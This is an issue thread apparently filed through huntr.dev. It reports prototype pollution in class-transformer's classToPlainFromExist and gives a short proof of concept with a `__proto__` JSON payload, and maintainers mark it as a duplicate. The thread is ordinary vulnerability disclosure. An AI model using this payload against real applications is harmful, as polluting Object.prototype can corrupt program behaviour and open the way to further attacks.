### ISSUE TITLE
huntr.dev - Prototype Pollution

### ISSUE THREAD

**Issue by huntr-helper** [typestack/class-transformer#340]
## Vulnerability Description
Affected versions of this package are vulnerable to Prototype Pollution. the `classToPlainFromExist` function could be tricked into adding or modifying properties of `Object.prototype` using a `__proto__` payload.

## Steps To Reproduce:
```js
var root = require("class-transformer"); 
var payload = JSON.parse('{"__proto__": {"hjw": "jhu"}}'); 
root.classToPlainFromExist(payload,{}); 
console.log({}.hjw);
```

**Bug Bounty**

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

**Comment by saulotoledo** [comment]
Issue already reported at #339.

**Comment by JamieSlome** [comment]
Brilliant, I have seen you have also referenced the pull request as well in the issue! 🍰

**Comment by saulotoledo** [comment]
@jotamorais This issue may be closed.
